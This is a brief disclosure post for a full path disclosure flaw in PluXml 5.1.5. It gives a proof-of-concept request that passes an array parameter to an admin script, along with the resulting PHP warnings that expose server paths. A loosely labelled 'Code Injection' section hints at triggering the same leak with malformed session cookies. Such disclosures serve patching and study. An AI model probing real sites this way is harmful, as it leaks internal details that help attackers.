PluxMl 5.1.5 Full Path Disclosure

1. [+] Author Mick_
2. [+]#Date 4/12/18
3. [+]#Vulnerabilty Full Path Dislosure
4. [+]#Pluxml 5.1.5
5.  
6. ------------------------------------
7.  
8. [+]#PoC:
9.  
10. http://127.0.0.1/pluxml/core/admin/article.php?a=FPD
11.  
12. Warning: preg_match() expects parameter 2 to be string, array given in C:\wamp\www\pluxml\core\admin\article.php on line 20
13.  
14. Warning: Cannot modify header information - headers already sent by (output started at C:\wamp\www\pluxml\core\admin\article.php:20) in C:\wamp\www\pluxml\core\admin\article.php on line 22
15.  
16. Code Injection:
17.  
18. //setcookie();
19.  
20. Warning: session_start() [function.session-start]:
21. The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in C:\wamp\www\pluxml\core\admin\prepend.php on line 28
22.  
23. Warning: session_start() [function.session-start]:
24. Cannot send session cookie - headers already sent by (output started at C:\wamp\www\pluxml\core\admin\prepend.php:28) in C:\wamp\www\pluxml\core\admin\prepend.php on line 28
25.